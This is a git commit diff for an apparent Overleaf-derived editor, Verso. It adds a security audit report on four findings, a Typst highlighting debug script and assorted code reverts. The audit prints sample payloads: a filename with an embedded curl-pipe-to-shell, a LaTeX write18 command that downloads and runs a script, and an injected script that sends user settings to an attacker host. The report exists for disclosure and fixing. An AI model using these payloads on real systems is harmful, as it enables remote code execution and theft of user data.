docs: add alpha-3 security audit report

Four findings: shell injection via filename (RCE on CLSI), auth bypass on publish-presentation routes, shell-escape without sandbox in prod, and stored XSS via published presentations (CSP removed on main origin). Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
Actualiser issues3.png
2026-06-19 10:10:19 +00:00 · 2026-06-09 07:25:39 +00:00 · 2026-06-09 07:25:13 +00:00 · 2026-06-08 22:02:14 +00:00 · 2026-06-08 21:22:11 +00:00 · 2026-06-08 21:21:48 +00:00
38 changed files with 532 additions and 648 deletions
@@ -0,0 +1,43 @@
+/**
+ * Typst syntax highlighting diagnostics.
+ * Paste into browser dev tools console with a Typst file open.
+ */
+
+// ── Part 1: CSS token counts (no view needed) ────────────────────────────
+// If all are 0, the language mode is not being applied at all.
+console.log('=== Token CSS class counts ===')
+;['heading','comment','keyword','string','number',
+  'variableName','function','emphasis','strong'].forEach(t => {
+  const n = document.querySelectorAll('.tok-' + t).length
+  console.log(`  .tok-${t}: ${n}`)
+})
+
+// ── Part 2: Try to get the parse tree ────────────────────────────────────
+// CodeMirror 6 stores DocView on .cm-content; DocView.view = EditorView
+const content = document.querySelector('.cm-content')
+const view = content?.cmView?.view
+
+if (!view?.state) {
+  console.warn('Could not find EditorView — parse tree unavailable')
+  console.log('Keys on .cm-content:', Object.keys(content ?? {}).join(', '))
+} else {
+  console.log('\n=== Parse tree (top 600 chars) ===')
+  console.log(view.state.tree.toString().slice(0, 600))
+
+  // First heading line
+  const doc = view.state.doc
+  for (let ln = 1; ln <= Math.min(doc.lines, 25); ln++) {
+    const line = doc.line(ln)
+    if (line.text.trimStart().startsWith('=')) {
+      console.log(`\n=== Nodes on heading line ${ln}: "${line.text}" ===`)
+      view.state.tree.iterate({
+        from: line.from, to: line.to,
+        enter(node) {
+          const t = doc.sliceString(node.from, node.to)
+          console.log(`  ${node.name}: ${JSON.stringify(t.slice(0, 50))}`)
+        }
+      })
+      break
+    }
+  }
+}
@@ -0,0 +1,259 @@
+# Verso Alpha-3 Security Audit
+
+**Date:** 2026-06-19
+**Branch audited:** `main` (full codebase)
+**Method:** multi-agent automated review + manual false-positive filtering
+
+---
+
+## Summary
+
+| # | Title | Severity | Confidence |
+|---|-------|----------|------------|
+| 1 | Shell injection via filename → RCE on CLSI | **HIGH** | 9/10 |
+| 2 | Read-only collaborator can publish / unpublish / rotate tokens | **HIGH** | 9/10 |
+| 3 | LaTeX `shell-escape` enabled without sandbox in production | **HIGH** | 9/10 |
+| 4 | Published presentations served without CSP (stored XSS on origin) | **MEDIUM** | 9/10 |
+
+---
+
+## Vuln 1 — Command Injection via Filename → RCE on CLSI
+
+**Files:**
+- `services/clsi/app/js/QuartoRunner.js` (lines 102–147)
+- `services/clsi/app/js/TypstRunner.js` (lines 139–141, 399–400)
+
+**Category:** `command_injection` / `rce`
+**Severity:** HIGH | **Confidence:** 9/10
+
+### Description
+
+`renderTarget` / `mainFile` (the project's root resource path) is interpolated directly into a shell command string passed to `/bin/sh -c` without any quoting or escaping:
+
+```js
+// QuartoRunner.js ~line 102
+const baseName = renderTarget.replace(/\.[^/.]+$/, '')
+// …passed to /bin/sh -c:
+`quarto render $COMPILE_DIR/${renderTarget} 2>&1 && mv ${baseName}.pdf output.pdf`
+`; rm -rf ${baseName}.qmd ${baseName}_files`
+```
+
+```js
+// TypstRunner.js ~line 140 — double quotes do NOT prevent $() or backtick expansion
+['/bin/sh', '-c', `typst watch "${absInput}" "${absOutput}" 2>&1`]
+
+// TypstRunner.js ~line 399 — completely unquoted
+['/bin/sh', '-c', `typst compile $COMPILE_DIR/${mainFile} output.pdf 2>&1`]
+```
+
+`SafePath.isCleanFilename()` (`SafePath.mjs` lines 24–37) only blocks `/`, `\`, `*`, and control characters. Shell metacharacters — `$`, `` ` ``, `(`, `)`, `;`, `&`, `|` — all pass through unchecked. The CLSI's own `_checkPath()` only rejects `..` path traversal.
+
+### Exploit Scenario
+
+Any project collaborator renames their root file to:
+
+```
+foo$(curl https://attacker.com/shell.sh|sh).qmd
+```
+
+Triggering a compile executes the injected command unsandboxed inside the CLSI container as the host process user.
+
+### Fix
+
+Use an args array instead of `/bin/sh -c` with a concatenated string:
+
+```js
+// Instead of:
+spawn('/bin/sh', ['-c', `quarto render ${renderTarget} ...`])
+
+// Use:
+spawn('quarto', ['render', absRenderTarget, '--to', 'pdf'])
+```
+
+For cases where a shell string is unavoidable, single-quote the variable: `'${renderTarget}'` (single quotes prevent all shell expansion). The safest fix is removing all three `/bin/sh -c templateString` invocations in favour of direct `spawn` with an explicit args array.
+
+---
+
+## Vuln 2 — Authorization Bypass: Read-Only Collaborators Can Publish / Unpublish / Rotate Tokens
+
+**File:** `services/web/app/src/router.mjs` (lines 697–710)
+
+**Category:** `authorization_bypass` / `privilege_escalation`
+**Severity:** HIGH | **Confidence:** 9/10
+
+### Description
+
+Three destructive presentation endpoints are gated on `ensureUserCanReadProject` instead of `ensureUserCanAdminProject`:
+
+```js
+webRouter.post('/project/:Project_id/publish-presentation',
+  AuthorizationMiddleware.ensureUserCanReadProject,   // ← should be ensureUserCanAdminProject
+  PublishedPresentationController.publish)
+
+webRouter.post('/project/:Project_id/publish-presentation/regenerate',
+  AuthorizationMiddleware.ensureUserCanReadProject,   // ← should be ensureUserCanAdminProject
+  PublishedPresentationController.regenerate)
+
+webRouter.delete('/project/:Project_id/publish-presentation',
+  AuthorizationMiddleware.ensureUserCanReadProject,   // ← should be ensureUserCanAdminProject
+  PublishedPresentationController.unpublish)
+```
+
+`canUserReadProject` returns `true` for the `READ_ONLY` privilege level (`AuthorizationManager.mjs` lines 260–276), which is granted to any read-only collaborator and to anonymous users holding a read-only token link. `canUserAdminProject` requires `OWNER` only.
+
+### Exploit Scenario
+
+User A shares a project read-only with User B. User B can:
+
+1. **`DELETE /publish-presentation`** — permanently take down the owner's published presentation
+2. **`POST /publish-presentation/regenerate`** — rotate the public/login/member share token, breaking all existing links
+3. **`POST /publish-presentation`** — force a recompile and overwrite the published snapshot
+
+### Fix
+
+```js
+// Change all three routes — replace:
+AuthorizationMiddleware.ensureUserCanReadProject
+// with:
+AuthorizationMiddleware.ensureUserCanAdminProject
+```
+
+One-line fix per route. This is the highest-priority fix because it requires no architectural change.
+
+---
+
+## Vuln 3 — LaTeX `shell-escape` Enabled Without Sandbox in Production (RCE)
+
+**Files:**
+- `.gitea/workflows/deploy-verso-prod.yml` (lines 332–333)
+- `services/clsi/app/js/LatexRunner.js` (lines 200–202)
+- `services/clsi/app/js/CommandRunner.js` (lines 12–16)
+
+**Category:** `rce` / `insecure_configuration`
+**Severity:** HIGH | **Confidence:** 9/10
+
+### Description
+
+The production Kubernetes deployment sets `OVERLEAF_LATEX_SHELL_ESCAPE: "true"` with neither `SANDBOXED_COMPILES` nor `DOCKER_RUNNER` configured. This passes `-shell-escape` to every latexmk invocation globally, for all users, with no per-user or per-project gating:
+
+```js
+// LatexRunner.js lines 200–202
+if (Settings.clsi?.latexShellEscape) {
+  command.push('-shell-escape')   // unconditional — applies to all users/projects
+}
+```
+
+Without `DOCKER_RUNNER=true`, `CommandRunner.js` selects `LocalCommandRunner` — compiles run as the host process with full container filesystem access. The reference `docker-compose.yml` *does* configure sandboxed compiles (`SANDBOXED_COMPILES: true`, `DOCKER_RUNNER: true`); the production K8s deployment simply omits them.
+
+The compile endpoint requires only `ensureUserCanReadProject`, so any holder of a read-only share link can trigger a compile.
+
+### Exploit Scenario
+
+Any user with read-only access to any project uploads or edits a `.tex` file containing:
+
+```latex
+\immediate\write18{curl https://attacker.com/shell.sh | bash}
+```
+
+Triggering a compile executes the command unsandboxed, with access to all mounted volumes (source files, Redis socket, compile output).
+
+### Fix (two steps)
+
+**Step 1 — Short term:** Remove `OVERLEAF_LATEX_SHELL_ESCAPE: "true"` from `.gitea/workflows/deploy-verso-prod.yml`. Disable shell-escape entirely unless there is a specific, per-project need.
+
+**Step 2 — Medium term:** Add sandboxed compile configuration to the production deployment, mirroring the reference `docker-compose.yml`:
+
+```yaml
+- name: SANDBOXED_COMPILES
+  value: "true"
+- name: DOCKER_RUNNER
+  value: "true"
+```
+
+This contains the blast radius of any future compile-path vulnerability regardless of shell-escape status.
+
+---
+
+## Vuln 4 — Stored XSS via Published Presentations (CSP Removed on Main Origin)
+
+**File:** `services/web/app/src/Features/PublishedPresentation/PublishedPresentationController.mjs` (line 116)
+
+**Category:** `xss` / `stored`
+**Severity:** MEDIUM | **Confidence:** 9/10
+
+### Description
+
+The published-presentation handler explicitly removes the Content-Security-Policy header before serving the raw HTML output:
+
+```js
+res.removeHeader('Content-Security-Policy')  // line 116
+res.sendFile(target, ...)                     // serves output.html / index.html directly
+```
+
+The file served is the raw Quarto/reveal.js compile output — not a sanitized template. Since users control the `.qmd` source entirely, arbitrary `<script>` blocks can be embedded. The `/p/:token` routes are registered on the same `webRouter` as the main app, so scripts execute with **full same-origin privileges** against the Verso application origin.
+
+### Impact
+
+- Any visitor to a `publicToken` link has the script execute in their browser (no login required to be targeted)
+- `fetch()` calls from the same origin automatically include the session cookie, bypassing `httpOnly`
+- A script can call the `/dev/csrf` endpoint to obtain a valid CSRF token, then call any mutating POST/DELETE API endpoint as the victim (read/write projects, change email, delete account, exfiltrate documents)
+
+### Exploit Scenario
+
+1. Attacker creates a Quarto project with a slide containing:
+   ```html
+   <script>
+     fetch('/user/settings', {credentials: 'include'})
+       .then(r => r.json())
+       .then(d => fetch('https://attacker.com/?d=' + btoa(JSON.stringify(d))))
+   </script>
+   ```
+2. Compiles and publishes → obtains the `publicToken` URL
+3. Shares the link with a victim
+4. Victim visits the link → script executes on the Verso origin → authenticated API calls made on victim's behalf
+
+### Fix
+
+The correct fix is to **serve published presentations from an isolated subdomain** (e.g., `decks.verso.example.com`) with no session cookie access, so embedded scripts are origin-isolated from the main app.
+
+As a stopgap, apply a restricted CSP instead of removing it entirely:
+
+```js
+// Instead of:
+res.removeHeader('Content-Security-Policy')
+
+// Apply a presentation-specific policy:
+res.setHeader('Content-Security-Policy',
+  "default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; connect-src 'none'")
+```
+
+`connect-src 'none'` blocks `fetch()`/XHR exfiltration even if inline scripts run.
+
+---
+
+## Items Reviewed and Not Flagged
+
+| Area | Finding |
+|------|---------|
+| MongoDB queries | No raw `req.body` interpolation; Mongoose used throughout |
+| CSRF protection | `csurf` middleware applied globally; no Verso-added bypass found |
+| `dangerouslySetInnerHTML` | Only in operator-controlled footer (env-var source, not user input) |
+| `DOMPurify` usage | `labs-description.tsx` uses it correctly with a strict allowlist |
+| Hardcoded credentials | `dev.env` has weak defaults; production uses auto-generated secrets from `100_generate_secrets.sh` |
+| Open redirects | `getSafeRedirectPath` strips to pathname only; no exploitable chain found |
+| SSRF (URL agent) | Proxied through `linkedUrlProxy`; host allowlisting in place |
+| Path traversal in `serve()` | `path.resolve` + `startsWith` guard is correct |
+| Session secret | Auto-generated at init, stored in `/etc/container_environment/CRYPTO_RANDOM` |
+
+---
+
+## Recommended Fix Priority for Alpha-3
+
+| Priority | Finding | Effort |
+|----------|---------|--------|
+| 1 | **Vuln 2** — wrong auth middleware on 3 routes | ~5 min, 3-line fix |
+| 2 | **Vuln 3** — remove `shell-escape` from prod deploy | ~5 min, remove 2 lines from YAML |
+| 3 | **Vuln 1** — fix quoting in QuartoRunner + TypstRunner | ~1 hour, refactor spawn calls |
+| 4 | **Vuln 4** — XSS via presentations | Hours–days; subdomain isolation is the real fix |
+
+Vulns 1–3 are straightforward enough to fix before shipping alpha-3. Vuln 4 can be mitigated with the `connect-src 'none'` CSP header as a stopgap and tracked as a post-alpha-3 architectural item.
@@ -26,12 +26,13 @@ cypress/results/
 # Ace themes for conversion
 frontend/js/features/source-editor/themes/ace/

-# Compiled parser files (latex/bibtex are generated by webpack plugin at build time)
+# Compiled parser files
 frontend/js/features/source-editor/lezer-latex/latex.mjs
 frontend/js/features/source-editor/lezer-latex/latex.terms.mjs
 frontend/js/features/source-editor/lezer-bibtex/bibtex.mjs
 frontend/js/features/source-editor/lezer-bibtex/bibtex.terms.mjs
-# typst compiled files are committed (generated via node scripts/lezer-latex/generate.mjs)
+frontend/js/features/source-editor/lezer-typst/typst.mjs
+frontend/js/features/source-editor/lezer-typst/typst.terms.mjs

 !**/fixtures/**/*.log

@@ -1,7 +1,6 @@
 import { pipeline } from 'node:stream/promises'
 import Metrics from '@overleaf/metrics'
 import ProjectGetter from '../Project/ProjectGetter.mjs'
-import { Project } from '../../models/Project.mjs'
 import CompileManager from './CompileManager.mjs'
 import ClsiManager from './ClsiManager.mjs'
 import logger from '@overleaf/logger'
@@ -9,7 +8,6 @@ import Settings from '@overleaf/settings'
 import Errors from '../Errors/Errors.js'
 import SessionManager from '../Authentication/SessionManager.mjs'
 import { userCanInstallPython } from './PythonVenvGate.mjs'
-import TokenAccessHandler from '../TokenAccess/TokenAccessHandler.mjs'
 import { RateLimiter } from '../../infrastructure/RateLimiter.mjs'
 import Validation from '../../infrastructure/Validation.mjs'
 import Path from 'node:path'
@@ -207,8 +205,7 @@ const _CompileController = {
    // Allow building a per-project Python venv from requirements.txt only for
    // the project owner and invited collaborators — never anonymous or
    // link-sharing users.
-    const anonToken = TokenAccessHandler.getRequestToken(req, projectId)
-    options.allowPythonInstall = await userCanInstallPython(userId, projectId, anonToken)
+    options.allowPythonInstall = await userCanInstallPython(userId, projectId)

    let {
      enablePdfCaching,
@@ -303,26 +300,6 @@ const _CompileController = {
      ? getOutputFilesArchiveSpecification(projectId, userId, buildId)
      : null

-    // Persist quarto output flavor so the project-list badge can distinguish
-    // RevealJS presentations from PDF documents without needing a compile.
-    // options.compiler is not sent by the frontend, so we read the stored
-    // compiler from the DB. Done fire-and-forget so it never delays the response.
-    if (status === 'success') {
-      const isHtml = outputFiles.some(f => f.path === 'output.html')
-      ProjectGetter.promises
-        .getProject(projectId, { compiler: 1 })
-        .then(project => {
-          if (project?.compiler !== 'quarto') return
-          return Project.updateOne(
-            { _id: projectId },
-            { quartoFlavor: isHtml ? 'revealjs' : 'pdf' }
-          ).exec()
-        })
-        .catch(err =>
-          logger.warn({ err, projectId }, 'failed to update quartoFlavor')
-        )
-    }
-
    res.json({
      status,
      outputFiles,
@@ -4,12 +4,11 @@ import AuthorizationManager from '../Authorization/AuthorizationManager.mjs'

 // Whether this user may have the compiler install a project's requirements.txt
 // into a cached venv (so Quarto's Python cells can use libraries beyond the
-// bundled base set). Allowed for any user who can access the project — owner,
-// invited collaborators, token-link users, and public-project readers — since
-// the set of packages to install is already controlled by requirements.vrf
-// (writable only by project members with write access). Returns false when the
-// feature is disabled, the privilege check fails, or the user has no access.
-export async function userCanInstallPython(userId, projectId, token = null) {
+// bundled base set). Gated to the project owner + invited collaborators (any
+// role): ignorePublicAccess excludes link-sharing/public and anonymous users,
+// who fall back to the base Python interpreter. Returns false when the feature
+// is disabled or the privilege check fails.
+export async function userCanInstallPython(userId, projectId) {
  if (!Settings.enableProjectPythonVenv) {
    return false
  }
@@ -18,7 +17,8 @@ export async function userCanInstallPython(userId, projectId, token = null) {
      await AuthorizationManager.promises.getPrivilegeLevelForProject(
        userId,
        projectId,
-        token
+        null,
+        { ignorePublicAccess: true }
      )
    return Boolean(privilegeLevel)
  } catch (err) {
@@ -681,7 +681,7 @@ async function _getProjects(
  const results = await Promise.all([
    ProjectGetter.promises.findAllUsersProjects(
      userId,
-      'name lastUpdated lastUpdatedBy publicAccesLevel archived trashed owner_ref tokens compiler quartoFlavor'
+      'name lastUpdated lastUpdatedBy publicAccesLevel archived trashed owner_ref tokens compiler'
    ),
    TagsHandler.promises.getAllTags(userId),
  ])
@@ -826,7 +826,6 @@ function _formatProjectInfo(project, accessLevel, source, userId) {
    archived,
    trashed,
    compiler: project.compiler,
-    quartoFlavor: project.quartoFlavor,
  }
 }

@@ -881,7 +880,6 @@ async function _injectProjectUsers(projects) {
        : users[project.owner_ref.toString()],
    owner_ref: undefined,
    compiler: project.compiler,
-    quartoFlavor: project.quartoFlavor,
  }))
 }

@@ -38,7 +38,6 @@ export const ProjectSchema = new Schema(
    version: { type: Number }, // incremented for every change in the project structure (folders and filenames)
    publicAccesLevel: { type: String, default: 'private' },
    compiler: { type: String, default: settings.defaultLatexCompiler },
-    quartoFlavor: { type: String, enum: ['revealjs', 'pdf'] },
    spellCheckLanguage: { type: String, default: 'en' },
    deletedByExternalDataSource: { type: Boolean, default: false },
    description: { type: String, default: '' },
@@ -8,7 +8,6 @@ import { usePermissionsContext } from '@/features/ide-react/context/permissions-
 import FileTreeActionButton from './file-tree-action-button'
 import { useRailContext } from '../../ide-react/context/rail-context'
 import PythonRequirementsModal from './python-requirements-modal'
-import { useProjectSettingsContext } from '@/features/editor-left-menu/context/project-settings-context'

 export default function FileTreeActionButtons({
  fileTreeExpanded,
@@ -20,8 +19,6 @@ export default function FileTreeActionButtons({
  const { write } = usePermissionsContext()
  const { handlePaneCollapse } = useRailContext()
  const [showPythonModal, setShowPythonModal] = useState(false)
-  const { compiler } = useProjectSettingsContext()
-  const isQuarto = compiler === 'quarto'

  const {
    canCreate,
@@ -115,7 +112,7 @@ export default function FileTreeActionButtons({
              iconType="delete"
            />
          )}
-          {write && isQuarto && (
+          {write && (
            <FileTreeActionButton
              id="python-packages"
              description={t('python_packages')}
@@ -4,21 +4,12 @@ import { ProjectCompiler } from '../../../../../../../types/project-settings'
 // Map the stored compiler engine to the document format the project produces.
 // CLSI dispatches the real engine from the root file's extension, but the
 // compiler field is a faithful, cheap proxy for the project's format.
-function formatLabel(
-  compiler: ProjectCompiler | undefined,
-  quartoFlavor: 'revealjs' | 'pdf' | undefined
-): {
+function formatLabel(compiler: ProjectCompiler | undefined): {
  label: string
-  variant: 'quarto-slides' | 'quarto' | 'typst' | 'latex'
+  variant: 'quarto' | 'typst' | 'latex'
 } {
  switch (compiler) {
    case 'quarto':
-      if (quartoFlavor === 'revealjs') {
-        return { label: 'Quarto Slides', variant: 'quarto-slides' }
-      }
-      if (quartoFlavor === 'pdf') {
-        return { label: 'Quarto PDF', variant: 'quarto' }
-      }
      return { label: 'Quarto', variant: 'quarto' }
    case 'typst':
      return { label: 'Typst', variant: 'typst' }
@@ -33,7 +24,7 @@ type FormatCellProps = {
 }

 export default function FormatCell({ project }: FormatCellProps) {
-  const { label, variant } = formatLabel(project.compiler, project.quartoFlavor)
+  const { label, variant } = formatLabel(project.compiler)

  return (
    <span
@@ -46,6 +46,5 @@ export const classHighlighter = tagHighlighter([
  { tag: tags.invalid, class: 'tok-invalid' },
  { tag: tags.punctuation, class: 'tok-punctuation' },
  // additional
-  { tag: tags.attributeName, class: 'tok-attributeName' },
  { tag: tags.attributeValue, class: 'tok-attributeValue' },
 ])
@@ -203,9 +203,6 @@ const staticTheme = EditorView.theme({
    alignItems: 'center',
    fontWeight: 'normal',
  },
-  // Bold and italic markup (e.g. *strong* _emphasis_ in Typst and Markdown)
-  '.tok-strong': { fontWeight: 'bold' },
-  '.tok-emphasis': { fontStyle: 'italic' },
  '.cm-selectionLayer': {
    zIndex: -10,
  },
@@ -23,53 +23,32 @@ const LEVELS: NestingLevel[] = [
 // after it, so this stays clear of code.
 const HEADING_REGEX = /^(=+)[ \t]+(.*\S)[ \t]*$/

-// Count unescaped '$' signs on a line to track math-mode parity.
-function countDollars(text: string): number {
-  let count = 0
-  for (let i = 0; i < text.length; i++) {
-    if (text[i] === '\\') { i++; continue }
-    if (text[i] === '$') count++
-  }
-  return count
-}
-
 function computeOutline(
  state: EditorState
 ): ProjectionResult<FlatOutlineItem> {
  const items: FlatOutlineItem[] = []
-  // Track whether we are inside a multi-line display math block.
-  // Each line with an odd number of unescaped '$' toggles the flag.
-  let inMath = false

  for (let n = 1; n <= state.doc.lines; n++) {
    const line = state.doc.line(n)
-    const text = line.text
+    const match = HEADING_REGEX.exec(line.text)
+    if (!match) continue

-    // Only attempt heading detection when not inside a math block.
-    // (e.g. '= b+c$' on the second line of '$ a \n= b+c$' must be skipped.)
-    if (!inMath) {
-      const match = HEADING_REGEX.exec(text)
-      if (match) {
-        const depth = match[1].length
-        const level = LEVELS[Math.min(depth, LEVELS.length) - 1]
-        // Strip a trailing line comment, then a trailing label.
-        const title = match[2]
-          .replace(/\s*\/\/.*$/, '')
-          .replace(/\s*<[\w-]+>\s*$/, '')
-          .trim()
+    const depth = match[1].length
+    const level = LEVELS[Math.min(depth, LEVELS.length) - 1]
+    // Strip a trailing line comment, then a trailing label.
+    const title = match[2]
+      .replace(/\s*\/\/.*$/, '')
+      .replace(/\s*<[\w-]+>\s*$/, '')
+      .trim()

-        items.push({
-          line: n,
-          toLine: n,
-          title,
-          from: line.from,
-          to: line.to,
-          level,
-        } as FlatOutlineItem)
-      }
-    }
-
-    if (countDollars(text) % 2 === 1) inMath = !inMath
+    items.push({
+      line: n,
+      toLine: n,
+      title,
+      from: line.from,
+      to: line.to,
+      level,
+    } as FlatOutlineItem)
  }

  return { items, status: ProjectionStatus.Complete }
@@ -14,8 +14,9 @@ import { typstDocumentOutline } from './document-outline'
 // Note on tree structure: rules starting with a lowercase letter in the grammar
 // are inline (no tree node), so their children are promoted to the parent.
 // E.g. codeArgItem, codeValue, callSuffix, codeArgList are all inline.
-// Named arg keys emit CodeArgKey (not CodeIdent) via codeIdentTokenizer,
-// so CodeArgKey appears at the same level as other codeArgItem children.
+// Therefore:
+//   - The named-argument key "CodeIdent" is a *direct* child of CodeArgs.
+//   - Positional arguments that are identifiers are wrapped in CallExpr.

 export const TypstLanguage = LRLanguage.define({
  name: 'typst',
@@ -49,13 +50,11 @@ export const TypstLanguage = LRLanguage.define({
        CodeBool: t.atom,

        // Identifiers:
-        //   CodeExpr/CodeIdent  — bare #func (no args) → function style
-        //   FuncExpr/CodeIdent  — func call with args/method (#func(...), link.with(url)) → function style
-        //   CodeArgKey          — named arg key (tokenizer pre-disambiguates on ':') → attributeName
-        //   CodeIdent           — plain variable/constant reference (e.g. 'left', 'center') → variable
-        'CodeExpr/CodeIdent': t.function(t.variableName),
-        'FuncExpr/CodeIdent': t.function(t.variableName),
-        CodeArgKey: t.attributeName,
+        //   - direct child of CallExpr → function/method name
+        //   - direct child of CodeArgs → named argument key (key: value syntax)
+        //   - everywhere else          → plain variable
+        'CallExpr/CodeIdent': t.function(t.variableName),
+        'CodeArgs/CodeIdent': t.attributeName,
        CodeIdent: t.variableName,

        // Literals in code mode
@@ -74,11 +73,8 @@ export const TypstLanguage = LRLanguage.define({
        MathContent: t.string,

        // Markup emphasis
-        'Strong/"*" Strong/StrongBody': t.strong,
-        'Emphasis/"_" Emphasis/EmphBody': t.emphasis,
-
-        // Bare URLs (https://... / http://...)
-        URL: t.string,
+        'Strong/"*" Strong/StrongText': t.strong,
+        'Emphasis/"_" Emphasis/EmphText': t.emphasis,

        // Labels (<name>) and references (@name)
        'Label/"<" Label/">" Label/LabelName': t.labelName,
@@ -101,9 +97,6 @@ const typstHighlightStyle = HighlightStyle.define([
  { tag: t.heading, fontWeight: 'bold' },
  { tag: t.strong, fontWeight: 'bold' },
  { tag: t.emphasis, fontStyle: 'italic' },
-  // Named arg keys (fill:, caption:, columns:…) — amber colour that reads
-  // well on both light and dark backgrounds, independent of theme CSS.
-  { tag: t.attributeName, color: '#c47900' },
 ])

 export const typst = () => {
@@ -8,50 +8,22 @@ import {
  RawBlockBody,
  RawBlockClose,
  RawInlineContent,
+  CodeBlockBody,
  BlockCommentBody,
  LineCommentContent,
  MathContent,
-  CodeKeyword,
-  CodeIdent,
-  CodeArgKey,
-  StrongBody,
-  EmphBody,
 } from './typst.terms.mjs'

-const BACKTICK    = 96  // `
-const SLASH       = 47  // /
-const STAR        = 42  // *
-const NEWLINE     = 10  // \n
-const EQUALS      = 61  // =
-const SPACE       = 32  //
-const TAB         =  9  // \t
-const DOLLAR      = 36  // $
+const BACKTICK  = 96  // `
+const SLASH     = 47  // /
+const STAR      = 42  // *
+const NEWLINE   = 10  // \n
+const EQUALS    = 61  // =
+const SPACE     = 32  //
+const TAB       =  9  // \t
+const DOLLAR    = 36  // $
 const OPEN_BRACE  = 123 // {
 const CLOSE_BRACE = 125 // }
-const HASH        = 35  // #
-const UNDERSCORE  = 95  // _
-const DOT         = 46  // .
-const OPEN_PAREN  = 40  // (
-const COMMA       = 44  // ,
-const COLON       = 58  // :
-const SEMICOLON   = 59  // ;
-const OPEN_ANGLE  = 60  // <
-const CLOSE_ANGLE = 62  // >
-const PLUS        = 43  // +
-
-const KEYWORDS = new Set([
-  'let', 'set', 'show', 'import', 'include',
-  'if', 'else', 'for', 'while', 'return',
-  'break', 'continue', 'in', 'as',
-  'and', 'or', 'not', 'context',
-])
-
-const BOOLS = new Set(['true', 'false', 'none', 'auto'])
-
-const isAlpha = ch => (ch >= 65 && ch <= 90) || (ch >= 97 && ch <= 122)
-const isDigit = ch => ch >= 48 && ch <= 57
-const isIdentHead = ch => isAlpha(ch) || ch === UNDERSCORE
-const isIdentTail = ch => isAlpha(ch) || isDigit(ch) || ch === UNDERSCORE || ch === 45

 // ── headingTokenizer ────────────────────────────────────────────────────
 // Emits HeadingMark — the "=+" prefix plus the trailing whitespace.
@@ -90,17 +62,6 @@ export const headingTitleTokenizer = new ExternalTokenizer(
    while (input.next !== -1 && input.next !== NEWLINE) {
      if (input.next === SLASH &&
          (input.peek(1) === SLASH || input.peek(1) === STAR)) break
-      // Stop before a trailing '<label>' so it is parsed as a Label node
-      // rather than being merged into the heading title text.
-      // Only stops when '<' is immediately followed by a valid label name and '>'.
-      if (input.next === OPEN_ANGLE) {
-        const ch = input.peek(1)
-        if (isAlpha(ch) || isDigit(ch) || ch === UNDERSCORE) {
-          let j = 2
-          while (isIdentTail(input.peek(j)) || input.peek(j) === DOT || input.peek(j) === COLON) j++
-          if (input.peek(j) === CLOSE_ANGLE) break
-        }
-      }
      input.advance()
      hasContent = true
    }
@@ -144,20 +105,6 @@ export const rawTokenizer = new ExternalTokenizer(
    }

    if (stack.canShift(RawBlockBody)) {
-      // Guard: must genuinely follow a RawBlockOpen (which ends with \n).
-      // Walk backward past any lang tag (A-Za-z0-9) and require ```.
-      // This blocks spurious LALR-merged states from consuming body text.
-      if (input.peek(-1) !== NEWLINE) return
-      let back = -2
-      while (
-        (input.peek(back) >= 65 && input.peek(back) <= 90) ||
-        (input.peek(back) >= 97 && input.peek(back) <= 122) ||
-        (input.peek(back) >= 48 && input.peek(back) <= 57)
-      ) { back-- }
-      if (input.peek(back)     !== BACKTICK ||
-          input.peek(back - 1) !== BACKTICK ||
-          input.peek(back - 2) !== BACKTICK) return
-
      let hasContent = false
      while (input.next !== -1) {
        if (
@@ -189,6 +136,36 @@ export const rawInlineTokenizer = new ExternalTokenizer(
  { contextual: false }
 )

+// ── codeBlockTokenizer ──────────────────────────────────────────────────
+// Emits CodeBlockBody — the interior of a #{ ... } code block.
+// Tracks brace nesting depth so that inner braces (e.g. #{ f({ x }) })
+// are included in the body rather than closing the outer block.
+export const codeBlockTokenizer = new ExternalTokenizer(
+  (input, _stack) => {
+    // The opening '{' has already been consumed by the grammar rule.
+    let depth = 1
+    let hasContent = false
+    while (input.next !== -1) {
+      const ch = input.next
+      if (ch === OPEN_BRACE) {
+        depth++
+        input.advance()
+        hasContent = true
+      } else if (ch === CLOSE_BRACE) {
+        if (depth === 1) break  // leave this '}' for the grammar rule
+        depth--
+        input.advance()
+        hasContent = true
+      } else {
+        input.advance()
+        hasContent = true
+      }
+    }
+    if (hasContent) input.acceptToken(CodeBlockBody)
+  },
+  { contextual: false }
+)
+
 // ── blockCommentTokenizer ───────────────────────────────────────────────
 // Emits BlockCommentBody — the interior of a /* ... */ comment.
 // Typst supports nested block comments (/* /* inner */ outer */), so this
@@ -238,13 +215,9 @@ export const lineCommentContentTokenizer = new ExternalTokenizer(
 )

 // ── mathContentTokenizer ────────────────────────────────────────────────
-// Emits MathContent — one line of content between the $...$ delimiters.
-// Stops at '$' or '\n' so each token is bounded to a single line.
-//
-// The grammar uses MathContent* (not MathContent?) so multi-line display
-// math ($ ... \n ... $) is handled by multiple MathContent tokens, one per
-// line, with @skip consuming the newlines in between.  This keeps each
-// token short and prevents a stray '$' from consuming the whole document.
+// Emits MathContent — everything between the $...$ delimiters (no newlines).
+// External rather than a @tokens rule for the same reason as LineCommentContent:
+// ![$\n]+ overlaps with spaces, '<', '@', and other literals in merged states.
 export const mathContentTokenizer = new ExternalTokenizer(
  (input, _stack) => {
    let hasContent = false
@@ -256,174 +229,3 @@ export const mathContentTokenizer = new ExternalTokenizer(
  },
  { contextual: false }
 )
-
-// ── codeKeywordTokenizer ─────────────────────────────────────────────────
-// Emits CodeKeyword (let, set, for, while, in, …) ONLY when the preceding
-// character is '#', i.e. we are immediately after the '#' sigil in a CodeExpr.
-//
-// The peek(-1)==='#' guard is what prevents LALR state-merging from causing
-// these tokens to fire in body-text positions.  Common English words like
-// "in", "for", "while", "return" appear in markup paragraphs; without the
-// guard they would be highlighted as keywords due to LALR-merged states where
-// CodeKeyword is technically in the valid set.
-export const codeKeywordTokenizer = new ExternalTokenizer(
-  (input, stack) => {
-    if (!stack.canShift(CodeKeyword)) return
-    // Valid positions: after '#', ':', '{' (code block start), or ';'.
-    // Walk back past optional whitespace.
-    let back = -1
-    while (input.peek(back) === SPACE || input.peek(back) === TAB || input.peek(back) === NEWLINE) back--
-    const kwPrev = input.peek(back)
-    if (kwPrev !== HASH && kwPrev !== COLON && kwPrev !== OPEN_BRACE && kwPrev !== SEMICOLON) return
-
-    // Peek ahead to read the full identifier without advancing.
-    let len = 0
-    while (true) {
-      const ch = input.peek(len)
-      if (isIdentHead(ch) || (len > 0 && isIdentTail(ch))) { len++ } else { break }
-    }
